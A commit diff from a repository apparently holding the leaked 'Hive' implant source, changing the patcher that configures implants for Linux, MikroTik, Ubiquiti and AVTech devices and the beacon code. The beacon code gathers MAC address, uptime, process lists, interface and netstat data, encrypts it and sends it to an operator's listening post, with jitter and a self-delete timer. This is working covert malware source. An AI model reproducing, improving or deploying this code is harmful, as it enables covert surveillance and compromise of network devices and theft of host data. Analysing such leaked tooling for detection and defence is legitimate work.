STRLCPY/Vault-8-Hive

Beacon changes/fixes.
User #142 committed 9 years ago

aff2551e

1 parent 6739e40b

■ ■ ■ ■ ■ ■

client/patcher.c

		skipped 57 lines
58	58		#define DEFAULT_BEACON_JITTER 3 // Default value is 3, range is from 0<=jitter<=30
59	59		#define DEFAULT_SELF_DELETE_DELAY 60 * 24 * 60 * 60 // Default value is 60 days...
60	60
61		-	struct cl_args {
62		-	unsigned int sig;
63		-	unsigned int beacon_port;
64		-	unsigned int host_len;
65		-	char beacon_ip[256];
66		-	char dns_ip[16];
67		-	char iface[16];
68		-	unsigned char idKey[ID_KEY_HASH_SIZE];
	61	+	typedef enum {FALSE=0, TRUE} boolean;
	62	+
	63	+	struct __attribute__ ((packed)) cl_args {
	64	+	unsigned int sig;
	65	+	unsigned int beacon_port;
	66	+	unsigned int trigger_delay;
69	67		unsigned long init_delay;
70	68		unsigned int interval;
71		-	unsigned int trigger_delay;
72	69		unsigned int jitter;
73		-	time_t delete_delay;
	70	+	unsigned long delete_delay;
	71	+	unsigned int patched;
	72	+	unsigned char idKey[ID_KEY_HASH_SIZE];
74	73		char sdpath[SD_PATH_LENGTH];
75		-	unsigned int patched;
76		-	} __attribute__ ((packed));
	74	+	char beacon_ip[256];
	75	+	char dns[2][16];
	76	+	};
77	77
78		-	struct cl_args args = {
79		-	SIG_HEAD,
80		-	DEFAULT_BEACON_PORT,
81		-	0,
82		-	{0},
83		-	{0},
84		-	{0},
85		-	{0},
86		-	DEFAULT_INITIAL_DELAY,
87		-	DEFAULT_BEACON_INTERVAL,
88		-	DEFAULT_TRIGGER_DELAY,
89		-	DEFAULT_BEACON_JITTER,
90		-	DEFAULT_SELF_DELETE_DELAY,
91		-	"/var",
92		-	1
	78	+	struct cl_args args = {
	79	+	SIG_HEAD,
	80	+	DEFAULT_BEACON_PORT,
	81	+	DEFAULT_TRIGGER_DELAY,
	82	+	DEFAULT_INITIAL_DELAY,
	83	+	DEFAULT_BEACON_INTERVAL,
	84	+	DEFAULT_BEACON_JITTER,
	85	+	DEFAULT_SELF_DELETE_DELAY,
	86	+	1,
	87	+	{0},
	88	+	{0},
	89	+	{0},
	90	+	{{0}}
93	91		};
94	92
95		-	typedef enum {FALSE=0, TRUE} boolean;
	93	+	//********************************************************************************
96	94
97	95		//define displaySha1Hash function
98	96		void printSha1Hash(FILE file, char tag, unsigned char *sha1Hash)
		skipped 25 lines
124	122		fprintf(stdout, " %s-j <b_jitter>%s - beacon jitter (integer of percent variance between 0 and 30 [0-30] )\n", GREEN, RESET);
125	123		fprintf(stdout, " %s-P <file path>%s - (optional) self-delete control/log file directory path [default: /var]\n", GREEN, RESET);
126	124		fprintf(stdout, " %s-p <port>%s - (optional) beacon port [default: 443]\n", GREEN, RESET);
127		-	fprintf(stdout, " %s-S <address>%s - IP address the DNS server (required if beacon address a is domain name\n", GREEN, RESET);
	125	+	fprintf(stdout, " %s-S <address>%s - IP address of the DNS server(s) (required if beacon address a is domain name\n", GREEN, RESET);
128	126		fprintf(stdout, " %s-s <sd_delay>%s - (optional) self delete delay since last successful trigger/beacon (in seconds) [default: 60 days]\n", GREEN, RESET);
129	127		fprintf(stdout, " %s-t <t_delay>%s - (optional) delay between trigger received & callback +/- 30 sec (in seconds) [default: 60 sec]\n", GREEN, RESET);
130	128		fprintf(stdout, " %s-m <OS>%s - (optional) target OS [default: 'all']. options:\n", GREEN, RESET);
		skipped 33 lines
164	162		//********************************************************************************
165	163		int main(int argc, char **argv)
166	164		{
167		-	int optval;
168		-	int linux_x86 = 0; // Linux x86
169		-	int mikrotik_x86 = 0; // MikroTik x86
170		-	int mikrotik_mips = 0; // MikroTik MIPS Big Endian
171		-	int mikrotik_ppc = 0; // MikroTik PowerPC [Big Endian]
172		-	int ubiquiti_mips = 0; // Ubiquiti MIPS Big Endian
173		-	int avtech_arm = 0; // AVTech ARM
174		-	int raw = 0; // unpatched versions
	165	+	int optval;
	166	+	int linux_x86 = 0; // Linux x86
	167	+	int mikrotik_x86 = 0; // MikroTik x86
	168	+	int mikrotik_mips = 0; // MikroTik MIPS Big Endian
	169	+	int mikrotik_ppc = 0; // MikroTik PowerPC [Big Endian]
	170	+	int ubiquiti_mips = 0; // Ubiquiti MIPS Big Endian
	171	+	int avtech_arm = 0; // AVTech ARM
	172	+	int raw = 0; // unpatched versions
175	173
176		-	char host = (char ) NULL; // cached hostname for user confirmation message
177		-	FILE *implantIDFile; // Used to save implant keys and subsequent sha1 hashes...
178		-	time_t currentTime; // Time stamp for ID key generation
179		-	struct tm *idKeyTime; // Pointer to the ID key generation data structure
180		-	unsigned char implantKey[ID_KEY_HASH_SIZE];
181		-	unsigned char triggerKey[ID_KEY_HASH_SIZE];
182		-	boolean keyed = FALSE; // Boolean to verify that a key was entered
183		-
184		-	args.sig = SIG_HEAD;
	174	+	char host = (char ) NULL; // cached hostname for user confirmation message
	175	+	FILE *implantIDFile; // Used to save implant keys and subsequent sha1 hashes...
	176	+	time_t currentTime; // Time stamp for ID key generation
	177	+	struct tm *idKeyTime; // Pointer to the ID key generation data structure
	178	+	unsigned char implantKey[ID_KEY_HASH_SIZE];
	179	+	unsigned char triggerKey[ID_KEY_HASH_SIZE];
	180	+	boolean keyed = FALSE; // Boolean to verify that a key was entered
185	181
186	182		implantKey[0] = '\0';
	183	+	args.sig = SIG_HEAD;
187	184
188	185		while ((optval = getopt(argc, argv, "+a:d:hI:i:j:K:k:m:P:p:S:s:t:")) != -1) {
189	186		switch (optval) {
190	187
191	188		case 'a': // Hostname / IP address of beacon LP
192		-	if (strlen(optarg) > sizeof(args.beacon_ip)) {
	189	+	if (strlen(optarg) >= sizeof(args.beacon_ip)) {
193	190		printf(" ERROR: Hostname or IP exceeds %d character limit\n", (int)sizeof(args.beacon_ip));
194	191		return -1;
195	192		}
		skipped 134 lines
330	327
331	328		case 'P': // Set path for self-delete control and log files
332	329		if (strlen(optarg) + 9 < SD_PATH_LENGTH) { // Make sure array is large enough for filename, '/' and '\0'
333		-	strcpy(args.sdpath, optarg); // Copy the path from the command line
	330	+	strcpy(args.sdpath, optarg); // Copy the path from the command line
334	331		} else {
335	332		fprintf(stderr, "ERROR: Directory path is too long (maximum 120 characters)");
336	333		return -1;
		skipped 8 lines
345	342		}
346	343		break;
347	344
348		-	case 'S': // DNS Server address
	345	+	case 'S': // DNS Server address(es) -- a comma separated list of up to two dotted quad addresses
349	346		{
350		-	char *address;
	347	+	char *dns;
	348	+	char *address_list;
	349	+
	350	+	address_list = strdup(optarg);
	351	+
	352	+	// Get 1st DNS server address and validate its length
	353	+	if ((dns = strtok(address_list, ","))) {
	354	+	if (strlen(dns) > 16) {
	355	+	fprintf(stderr, "ERROR: DNS server address too long -- must be in dotted quad format (e.g. 192.168.53.53)\n");
	356	+	return -1;
	357	+	}
	358	+	memcpy(args.dns[0], dns, strlen(dns));
	359	+	} else {
	360	+	args.dns[0][0] = '\0';
	361	+	fprintf(stderr, "Missing DNS address\n");
	362	+	return -1;
	363	+	}
351	364
352		-	address = optarg;
353		-	if (strlen(address) > 16) {
354		-	fprintf(stderr, "ERROR: DNS server address too long -- must be in dotted quad format (e.g. 192.168.53.53)\n");
355		-	return -1;
	365	+	// Get 2nd DNS server address if it was entered and validate its length
	366	+	if ((dns = strtok(NULL, ","))) {
	367	+	if (strlen(dns) > 16) {
	368	+	fprintf(stderr, "ERROR: Second DNS server address too long -- must be in dotted quad format (e.g. 192.168.53.53)\n");
	369	+	return -1;
	370	+	}
	371	+	memcpy(args.dns[1], dns, strlen(dns));
	372	+	} else
	373	+	args.dns[1][0] = '\0';
	374	+	free(address_list);
356	375		}
357		-	strncpy(args.dns_ip, address, sizeof(args.dns_ip));
358	376		break;
359		-	}
360	377
361	378		case 's': // self delete delay
362	379		args.delete_delay = strtoul(optarg, NULL, 10);
		skipped 18 lines
381	398
382	399		{ // Validate IP addressing - must have a valid IP or a domain name
383	400		uint32_t beaconIPaddr = 0;
384		-	if (strlen(args.dns_ip) == 0 && inet_pton(AF_INET, host, &beaconIPaddr) == 0) {
385		-	printf("%sError: The beacon address is invalid, or no DNS server address was specified.%s\n", RED, RESET);
386		-	return -1;
	401	+
	402	+	if (args.init_delay > 0) { // Beacons enabled
	403	+
	404	+	if (args.beacon_port == 0) {
	405	+	DLX(1, printf("No Beacon Port Specified!\n"));
	406	+	DLX(1, printUsage(argv[0]));
	407	+	}
	408	+
	409	+	// Obtain Beacon IP address
	410	+	if (strlen(host) == 0) {
	411	+	DLX(1, printf("No Beacon IP address specified!\n"));
	412	+	DLX(1, printUsage(argv[0]));
	413	+	return -1;
	414	+	}
	415	+
	416	+	RandFill(args.beacon_ip, sizeof(args.beacon_ip)); // Fill/initialize field with random data
	417	+	strcpy(args.beacon_ip, host); // Copy string representation of hostname or IP into the field including the null byte
	418	+	if (inet_pton(AF_INET, args.beacon_ip, &beaconIPaddr) <= 0) { // Determine if beacon IP is a valid address
	419	+	if (args.dns[0] == NULL) { // If not, verify that a DNS server address was specified
	420	+	DLX(1, printf("Beacon IP was specified as a domain name, but no valid DNS server address was specified to resolve the name!\n"));
	421	+	return -1;
	422	+	}
	423	+	}
387	424		}
388		-
389		-	RandFill(args.beacon_ip, sizeof(args.beacon_ip)); // Fill/initialize field with random data
390		-	args.host_len = strlen(host);
391		-	memcpy(args.beacon_ip, host, args.host_len); // Copy string representation of hostname or IP into the field
392	425		}
393	426
394	427		if (raw == 0) {
		skipped 25 lines
420	453		avtech_arm = 1;
421	454		}
422	455
423		-
424	456		printf("\n");
425	457		printf(" This application will generate PATCHED files with the following values:\n\n");
426	458		printf("\t%32s: %-s\n", "Beacon Server IP address", host);
427	459		printf("\t%32s: %-d\n", "Beacon Server Port number", args.beacon_port);
428		-	printf("\t%32s: %-s\n", "DNS Server IP address", args.dns_ip);
	460	+	printf("\t%32s: %-s\n", "Primary DNS Server IP address", args.dns[0]);
	461	+	printf("\t%32s: %-s\n", "Secondary DNS Server IP address", args.dns[1]);
429	462		printf("\t%32s: ", "Trigger Key"); printSha1Hash(stdout, "", triggerKey); printf("\n");
430	463		printf("\t%32s: ", "Implant Key"); printSha1Hash(stdout, "", implantKey); printf("\n");
431	464		printf("\t%32s: %-lu\n", "Beacon Initial Delay (sec)", args.init_delay / 1000);
		skipped 16 lines
448	481		if (avtech_arm == 1 \|\| raw == 1) printf(" . AVTech/ARM\n");
449	482
450	483		if (raw == 0) {
	484	+	cl_string((unsigned char *) args.dns[0], sizeof(args.dns[0]));
	485	+	cl_string((unsigned char *) args.dns[1], sizeof(args.dns[1]));
451	486		cl_string((unsigned char *) args.beacon_ip, sizeof(args.beacon_ip));
452		-	cl_string((unsigned char *) args.iface, sizeof(args.iface));
453	487		cl_string((unsigned char *) args.sdpath, sizeof(args.sdpath));
454		-	cl_string((unsigned char *) args.dns_ip, sizeof(args.dns_ip));
455	488		}
456	489
457	490		remove(HIVE_LINUX_X86_FILE);
		skipped 108 lines
566	599		} else if (big_endian == 1) {
567	600		copy_of_args.sig = htonl(copy_of_args.sig);
568	601		copy_of_args.beacon_port = htonl(copy_of_args.beacon_port);
569		-	copy_of_args.host_len = htonl(copy_of_args.host_len);
570	602		copy_of_args.init_delay = htonl(copy_of_args.init_delay);
571	603		copy_of_args.interval = htonl(copy_of_args.interval);
572	604		copy_of_args.jitter = htonl(copy_of_args.jitter);
		skipped 30 lines

■ ■ ■ ■ ■ ■

common/crypto/crypto.c

		skipped 177 lines
178	178		DLX(4, printf("\tPerforming the TLS handshake... \n"));
179	179
180	180		while ((ret = ssl_handshake(ioc->ssl)) != 0) {
181		-	if (ret != POLARSSL_ERR_NET_WANT_WRITE) {
	181	+	if (ret == POLARSSL_ERR_SSL_CONN_EOF)
	182	+	DLX(4, printf("\tNormal reset by Blot Proxy: "); print_ssl_error(ret));
	183	+	return -1;
	184	+	if (ret != POLARSSL_ERR_NET_WANT_WRITE && ret != POLARSSL_ERR_SSL_CONN_EOF) {
182	185		DLX(4, printf("\tTLS handshake failed: "); print_ssl_error(ret));
183	186		return -1;
184	187		}
		skipped 534 lines

■ ■ ■ ■ ■ ■

common/polarssl-1.1.8/library/Makefile

		skipped 60 lines
61	61		CFLAGS += -DDEBUG -D_DEBUG -g -O0
62	62		endif
63	63		ifeq ("$(DEBUG)", "3")
64		-	CFLAGS += -DPOLARSSL_DEBUG_C -DPOLARSSL_DEBUG_MSG -DPOLARSSL_SSL_DEBUG_ALL -DPOLARSSL_SELF_TEST
	64	+	CFLAGS += -g -O0 -DDEBUG -D_DEBUG -DPOLARSSL_DEBUG_C -DPOLARSSL_DEBUG_MSG -DPOLARSSL_SSL_DEBUG_ALL -DPOLARSSL_SELF_TEST
65	65		endif
66	66		else
67	67		CFLAGS += -Os
		skipped 81 lines

■ ■ ■ ■ ■ ■

common/polarssl-1.1.8/library/net.c

		skipped 104 lines
105	105		struct sockaddr_in server_addr;
106	106		struct hostent *server_host;
107	107
108		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
109		-	WSADATA wsaData;
110		-
111		-	if( wsa_init_done == 0 )
112		-	{
113		-	if( WSAStartup( MAKEWORD(2,0), &wsaData ) == SOCKET_ERROR )
114		-	return( POLARSSL_ERR_NET_SOCKET_FAILED );
115		-
116		-	wsa_init_done = 1;
117		-	}
118		-	#else
119	108		signal( SIGPIPE, SIG_IGN );
120		-	#endif
121	109
122	110		if( ( server_host = gethostbyname( host ) ) == NULL )
123	111		return( POLARSSL_ERR_NET_UNKNOWN_HOST );
		skipped 26 lines
150	138		int n, c[4];
151	139		struct sockaddr_in server_addr;
152	140
153		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
154		-	WSADATA wsaData;
155		-
156		-	if( wsa_init_done == 0 )
157		-	{
158		-	if( WSAStartup( MAKEWORD(2,0), &wsaData ) == SOCKET_ERROR )
159		-	return( POLARSSL_ERR_NET_SOCKET_FAILED );
160		-
161		-	wsa_init_done = 1;
162		-	}
163		-	#else
164	141		signal( SIGPIPE, SIG_IGN );
165		-	#endif
166	142
167	143		if( ( *fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ) ) < 0 )
168	144		return( POLARSSL_ERR_NET_SOCKET_FAILED );
		skipped 44 lines
213	189		*/
214	190		static int net_is_blocking( void )
215	191		{
216		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
217		-	return( WSAGetLastError() == WSAEWOULDBLOCK );
218		-	#else
219	192		switch( errno )
220	193		{
221	194		#if defined EAGAIN
		skipped 5 lines
227	200		return( 1 );
228	201		}
229	202		return( 0 );
230		-	#endif
231	203		}
232	204
233	205		/*
		skipped 33 lines
267	239		*/
268	240		int net_set_block( int fd )
269	241		{
270		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
271		-	u_long n = 0;
272		-	return( ioctlsocket( fd, FIONBIO, &n ) );
273		-	#else
274	242		return( fcntl( fd, F_SETFL, fcntl( fd, F_GETFL ) & ~O_NONBLOCK ) );
275		-	#endif
276	243		}
277	244
278	245		int net_set_nonblock( int fd )
279	246		{
280		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
281		-	u_long n = 1;
282		-	return( ioctlsocket( fd, FIONBIO, &n ) );
283		-	#else
284	247		return( fcntl( fd, F_SETFL, fcntl( fd, F_GETFL ) \| O_NONBLOCK ) );
285		-	#endif
286	248		}
287	249
288	250		/*
		skipped 19 lines
308	270		if( net_is_blocking() != 0 )
309	271		return( POLARSSL_ERR_NET_WANT_READ );
310	272
311		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
312		-	if( WSAGetLastError() == WSAECONNRESET )
313		-	return( POLARSSL_ERR_NET_CONN_RESET );
314		-	#else
315	273		if( errno == EPIPE \|\| errno == ECONNRESET )
316	274		return( POLARSSL_ERR_NET_CONN_RESET );
317	275
318	276		if( errno == EINTR )
319	277		return( POLARSSL_ERR_NET_WANT_READ );
320		-	#endif
321	278
322	279		return( POLARSSL_ERR_NET_RECV_FAILED );
323	280		}
		skipped 13 lines
337	294		if( net_is_blocking() != 0 )
338	295		return( POLARSSL_ERR_NET_WANT_WRITE );
339	296
340		-	#if defined(_WIN32) \|\| defined(_WIN32_WCE)
341		-	if( WSAGetLastError() == WSAECONNRESET )
342		-	return( POLARSSL_ERR_NET_CONN_RESET );
343		-	#else
344	297		if( errno == EPIPE \|\| errno == ECONNRESET )
345	298		return( POLARSSL_ERR_NET_CONN_RESET );
346	299
347	300		if( errno == EINTR )
348	301		return( POLARSSL_ERR_NET_WANT_WRITE );
349		-	#endif
350	302
351	303		return( POLARSSL_ERR_NET_SEND_FAILED );
352	304		}
		skipped 15 lines

documentation/UsersGuide/UsersGuide.odt

Binary file.
documentation/UsersGuide/UsersGuide.pdf

Binary file.

■ ■ ■ ■ ■ ■

server/beacon.c

		skipped 20 lines
21	21		#include "string_utils.h"
22	22		#include "dns_protocol.h"
23	23
	24	+	#define Free(x) if ( (x) != NULL ) free((x));
24	25		//******************************************************************
25	26		#if defined LINUX \|\| defined SOLARIS
26	27		#include <pthread.h>
		skipped 79 lines
106	107		// TODO: should this be Sleep( 60 * 100 ); ???
107	108		sleep(60);
108	109		}
109		-
110	110		if (make_thread(beacon, (void *) beaconInfo) != SUCCESS) {
111	111		DLX(1, printf(" ERROR: failed to create beacon thread\n"));
112	112		return FAILURE;
		skipped 13 lines
126	126
127	127		beaconInfo = (BEACONINFO *) param;
128	128		DLX(4, printf("Starting beacon thread with initial beacon delay of %ld seconds\n", beaconInfo->initDelay / 1000));
129		-	DLX(4, printf("Beacon Host: %s, (%d bytes)\n", beaconInfo->host, strlen(beaconInfo->host)));
130	129		Sleep(beaconInfo->initDelay); // Wait for initial delay
131	130
132	131		for (;;) { // Beacon Loop
		skipped 1 lines
134	133		DLX(4, printf("\tSystem uptime is %ld\n", secondsUp));
135	134
136	135		// Resolve beacon IP address
137		-	if (inet_pton(AF_INET, beaconInfo->host, &beaconIPaddr) <= 0) { // Determine if beacon IP is an address
	136	+	if (inet_pton(AF_INET, beaconInfo->host, &beaconIPaddr) <= 0) { // Determine if beacon host is an name or dotted-quad address
138	137		for (i = 0; i < 2; i++) {
139	138		if (strlen(beaconInfo->dns[i]))
140	139		DLX(4, printf("\tPerforming DNS lookup for %s using DNS server at %s.\n", beaconInfo->host, beaconInfo->dns[i]));
		skipped 4 lines
145	144		DLX(4, printf("\tBeacon host could not be resolved.\n"));
146	145		goto sleep; // Try again next beacon interval
147	146		}
148		-	}
	147	+	} else
	148	+	beaconInfo->ip = strdup(beaconInfo->host); // IF beaconInfo-> host was an IP address, clone it (so it can be freed later)
149	149
150	150		if (beaconInfo->percentVariance > 0) {
151		-	jitter = calc_jitter(beaconInfo->interval, beaconInfo->percentVariance); // get jitter and calculate new interval
	151	+	DLX(4, printf("Variance = %f\n", beaconInfo->percentVariance));
	152	+	jitter = calc_jitter(beaconInfo->interval, beaconInfo->percentVariance); // Get jitter and calculate new interval
	153	+	DLX(4, printf("Jitter = %d\n", jitter));
152	154		beaconInterval = beaconInfo->interval + jitter;
	155	+	DLX(4, printf("Beacon Interval = %d\n", beaconInterval));
153	156		} else {
154	157		beaconInterval = beaconInfo->interval;
155	158		}
		skipped 5 lines
161	164		} else {
162	165		DLX(4, printf("\tSend of beacon failed\n"));
163	166		}
164		-	free(beaconInfo->ip);
	167	+	Free(beaconInfo->ip);
165	168
166	169		sleep:
167	170		DLX(4, printf("\tSending next beacon in %d seconds.\n", beaconInterval / 1000));
		skipped 62 lines
230	233		memset(temp, 0, 1024);
231	234
232	235		//Populate Beacon Header
233		-	bhdr.os = 0;
	236	+	bhdr.os = BH_UNDEFINED;
	237	+
234	238		#if defined AVTECH_ARM
235		-	bhdr.os = htons(BH_AVTECH_ARM);
	239	+	bhdr.os = BH_AVTECH_ARM;
236	240
237	241		#elif defined MIKROTIK
238	242		#if defined _PPC
239		-	bhdr.os = htons(BH_MIKROTIK_PPC);
	243	+	bhdr.os = BH_MIKROTIK_PPC;
240	244		#elif defined _MIPS
241		-	bhdr.os = htons(BH_MIKROTIK_MIPS);
	245	+	bhdr.os = BH_MIKROTIK_MIPS;
242	246		#elif defined _MIPSEL
243		-	bhdr.os = htons(BH_MIKROTIK_MIPSEL);
	247	+	bhdr.os = BH_MIKROTIK_MIPSEL;
244	248		#elif defined _X86
245		-	bhdr.os = htons(BH_MIKROTIK_X86);
	249	+	bhdr.os = BH_MIKROTIK_X86;
246	250		#endif
247	251
248	252		#elif (defined LINUX) && (!defined UBIQUITI)
249	253		#if defined _X86
250		-	bhdr.os = htons(BH_LINUX_X86);
	254	+	bhdr.os = BH_LINUX_X86;
251	255		#elif defined _X86_64
252		-	bhdr.os = htons(BH_LINUX_X86_64);
	256	+	bhdr.os = BH_LINUX_X86_64;
253	257		#endif
254	258
255	259		#elif defined UBIQUITI
256		-	bhdr.os = htons(BH_UBIQUITI_MIPS);
	260	+	bhdr.os = BH_UBIQUITI_MIPS;
257	261
258	262		#else
259	263		#error "ARCHITECTURE NOT DEFINED"
260	264		#endif
261	265
262		-	//TODO: Change this number whenever the version changes.
263		-	bhdr.version = htons(29);
	266	+	bhdr.version = BEACON_HEADER_VERSION;
264	267		DLX(4, printf("\tBEACON HEADER: version: %i, os: %i\n", bhdr.version, bhdr.os));
	268	+	DLX(4, printf("\tBEACON DATA CHECK: IP: %s, Port: %d\n", beaconInfo->ip, beaconInfo->port));
	269	+	bhdr.version = htons(BEACON_HEADER_VERSION); //TODO: Change this number whenever the version changes.
	270	+	bhdr.os = htons(bhdr.os); // Convert for network byte order
265	271
266	272		//Populate Additional Headers
267		-	//mac address
	273	+	// MAC address
268	274		mac_hdr.type = htons(MAC);
269	275		mac_data = (unsigned char *) malloc(MAC_ADDR_LEN_FORMATTED);
270	276		if (mac_data != NULL) {
		skipped 2 lines
273	279		}
274	280		mac_len = strlen((char *) mac_data);
275	281		mac_hdr.length = htons(mac_len);
276		-	//uptime
	282	+
	283	+	// Uptime
277	284		uptime_hdr.type = htons(UPTIME);
278	285		memset(temp, 0, 1024);
279	286		sprintf(temp, "%lu", uptime);
		skipped 5 lines
285	292		memset(uptime_data, 0, uptime_len);
286	293		memcpy(uptime_data, temp, uptime_len);
287	294		}
288		-	//next beacon time in seconds
	295	+	// Next-beacon time in seconds
289	296		next_beacon_hdr.type = htons(NEXT_BEACON_TIME);
290	297		memset(temp, 0, 1024);
291	298		sprintf(temp, "%d", (next_beacon / 1000));
		skipped 6 lines
298	305		memset(next_beacon_data, 0, next_beacon_len);
299	306		memcpy(next_beacon_data, temp, next_beacon_len);
300	307		}
301		-	//process list
	308	+	// Process list
302	309		proc_list_hdr.type = htons(PROCESS_LIST);
303	310		//TODO: check malloc() return value
304	311		proc_list_data = get_process_list(&size);
		skipped 119 lines
424	431		compressed_packet = compress_packet(packet, packetSize, &compressedPacketSize);
425	432		DLX(5, printf("Original packet size: %d, Compressed packet size: %d\n", packetSize, compressedPacketSize));
426	433		//combine compressed_packet with beacon header.
427		-	if (packet != NULL) {
428		-	free(packet);
429		-	}
	434	+
	435	+	Free(packet);
	436	+
430	437
431	438		packetSize = sizeof(BEACON_HDR) + compressedPacketSize;
432	439		packet = (unsigned char *) malloc(packetSize);
433	440		if (packet == NULL) {
434	441		goto EXIT;
435	442		}
436		-	//zero out buffer
437		-	memset(packet, 0, packetSize);
438		-	//copy in beacon hdr
439		-	memcpy(packet, &bhdr, sizeof(BEACON_HDR));
440		-	//copy in compressed data
441		-	memcpy(packet + sizeof(BEACON_HDR), compressed_packet, compressedPacketSize);
442	443
443		-	//calculate encryption buffer size
444		-	encrypt_size = packetSize + (8 - (packetSize % 8));
	444	+	memset(packet, 0, packetSize); // Zero out buffer
	445	+	memcpy(packet, &bhdr, sizeof(BEACON_HDR)); // Copy-in beacon header
	446	+	memcpy(packet + sizeof(BEACON_HDR), compressed_packet, compressedPacketSize); // Copy-in compressed data
	447	+	encrypt_size = packetSize + (8 - (packetSize % 8)); // Calculate encryption buffer size
445	448
446	449		//connect to the client
447		-	DLX(4, printf("Attempting connection to client %s on port %d...\n", beaconInfo->ip, beaconInfo->port));
	450	+	DLX(4, printf("\tAttempting connection to client %s on port %d...\n", beaconInfo->ip, beaconInfo->port));
448	451		retval = net_connect(&sock, beaconInfo->ip, beaconInfo->port);
449		-
450	452		if (retval != SUCCESS) {
451	453		DLX(1, printf("\tERROR: net_connect(): "); if (retval == POLARSSL_ERR_NET_CONNECT_FAILED) {
452	454		printf("NET_CONNECT_FAILED\n");}
		skipped 37 lines
490	492
491	493		DLX(4, printf("\tHandshake Complete!\n"));
492	494
493		-	//turn off the ssl encryption since we use our own
494		-	beacon_io->ssl->do_crypt = 0;
	495	+	beacon_io->ssl->do_crypt = 0; //turn off the ssl encryption since we use our own
	496	+	generate_random_bytes(randData, 64); //generate 32 random bytes
	497	+	embedSize(encrypt_size, randData); //embed the data size so the server knows how much data to read
495	498
496		-	//generate 32 random bytes
497		-	generate_random_bytes(randData, 64);
498		-
499		-	//embed the data size so the server knows how much data to read
500		-	embedSize(encrypt_size, randData);
501	499		DLX(4, printf("\tEncrypt_size is %d \n", encrypt_size));
502		-
503	500		DLX(4, printf("\tSending the first 64 bytes with data size encoded in random data\n"));
504	501		//send the bytes
505	502		if (crypt_write(beacon_io, randData, 64) < 0) { //TODO: this is probably no the best check... maybe 32 > crypt_write
		skipped 2 lines
508	505		}
509	506		//receive the buffer
510	507		memset(randData, 0, 64);
511		-
512	508		retval = recv(sock, (char *) randData, 37, 0);
513	509		if (retval < 0) {
514	510		DLX(4, printf("\tReceive failed:"));
		skipped 3 lines
518	514		}
519	515		DLX(4, printf("\tReceived %d bytes\n", retval));
520	516
521		-	//extract the key
522		-	extract_key(randData + 5, key);
	517	+	extract_key(randData + 5, key); //extract the key
523	518
524	519		//encrypt the beacon data with the extracted key
525	520		//the buffer is padded so that it can be broken
		skipped 4 lines
530	525		goto EXIT;
531	526		}
532	527		memset(enc_buf, 0, encrypt_size);
533		-
534	528		encrypt_data(packet, packetSize, enc_buf, key);
535	529
536		-	//send the data
537		-	//while we haven't sent all data keep going
538		-	//send size embedded in rand data
539		-	//send encrypted data
	530	+	// Send the data until all data has been sent
	531	+	// Size embedded in random data
	532	+	// Send encrypted data
540	533		do {
541	534
542		-	//embed the data size so the server knows how much data to read
	535	+	// Embed the data size so the server knows how much data to read
543	536		sz_to_send = (encrypt_size - bytes_sent) >= MAX_SSL_PACKET_SIZE ? MAX_SSL_PACKET_SIZE : encrypt_size - bytes_sent;
544	537		DLX(6, printf("\tSending: %d bytes\n", sz_to_send));
545	538
		skipped 4 lines
550	543		retval = FAILURE;
551	544		goto EXIT;
552	545		}
	546	+
553	547		// Receive ACK
554	548		memset(recv_buf, 0, 30);
555		-
556	549		retval = recv(sock, recv_buf, 30, 0);
557	550		if (retval < 0) {
558	551		DLX(4, printf("\tReceive failed:"));
		skipped 1 lines
560	553		retval = FAILURE;
561	554		goto EXIT;
562	555		}
	556	+	if (retval == 0) {
	557	+	DLX(6, printf("\tPeer closed connection\n")); // Not sure if this should be success or failure
	558	+	break;
	559	+	}
563	560		DLX(6, printf("\tReceived %d bytes\n", retval));
	561	+	DPB(7, "Received buffer: ", (const unsigned char *)recv_buf, retval);
	562	+	DPB(7, "Received data: ", (const unsigned char *)(recv_buf + sizeof(SSL_HDR)), retval - (sizeof(SSL_HDR) ));
564	563
565		-	recv_sz = atoi(recv_buf + (sizeof(SSL_HDR) - 1));
	564	+	recv_sz = atoi(recv_buf + (sizeof(SSL_HDR)));
566	565		DLX(6, printf("\tACKed bytes: %d\n", recv_sz));
567	566		bytes_sent += recv_sz;
568	567		DLX(6, printf("\tTotal bytes sent: %d, %d to go\n", bytes_sent, encrypt_size - bytes_sent));
		skipped 2 lines
571	570		retval = SUCCESS;
572	571		DLX(4, printf("BEACON SENT cleaning up\n"));
573	572
574		-	EXIT:
575		-	//cleanup
	573	+	EXIT: // cleanup
576	574
577	575		if (beacon_io)
578	576		if (beacon_io->ssl->major_ver >= 1) {
		skipped 1 lines
580	578		crypt_cleanup(beacon_io);
581	579		}
582	580
583		-	if (mac_data != NULL) {
584		-	free(mac_data);
585		-	}
586		-
587		-	if (uptime_data != NULL) {
588		-	free(uptime_data);
589		-	}
590		-
591		-	if (next_beacon_data != NULL) {
592		-	free(next_beacon_data);
593		-	}
594		-
595		-	if (proc_list_data != NULL) {
596		-	release_process_list(proc_list_data);
597		-	}
598		-
599		-	if (ipconfig_data != NULL) {
600		-	release_ifconfig(ipconfig_data);
601		-	}
602		-
603		-	if (netstat_rn_data != NULL) {
604		-	release_netstat_rn(netstat_rn_data);
605		-	}
606		-
607		-	if (netstat_an_data != NULL) {
608		-	release_netstat_an(netstat_an_data);
609		-	}
610		-
611		-	if (enc_buf != NULL) {
612		-	free(enc_buf);
613		-	}
614		-
615		-	if (packet != NULL) {
616		-	free(packet);
617		-	}
618		-
619		-	if (compressed_packet != NULL) {
620		-	release_compressed_packet(compressed_packet);
621		-	}
	581	+	Free(mac_data);
	582	+	Free(uptime_data);
	583	+	Free(next_beacon_data);
	584	+	Free(proc_list_data);
	585	+	Free(ipconfig_data);
	586	+	Free(netstat_rn_data);
	587	+	Free(netstat_an_data);
	588	+	Free(enc_buf);
	589	+	Free(packet);
	590	+	Free(compressed_packet);
622	591
623	592		if (sock > 0)
624	593		net_close(sock);
		skipped 66 lines

■ ■ ■ ■ ■ ■

server/beacon.h

		skipped 3 lines
4	4		#include "function_strings.h"
5	5		#include "compat.h"
6	6
	7	+	#define BEACON_HEADER_VERSION 29
	8	+
7	9		#define MAC_ADDR_LEN 6
8	10		#define MAC_ADDR_LEN_FORMATTED 18
9	11		#define MAX_SSL_PACKET_SIZE 4052
		skipped 4 lines
14	16
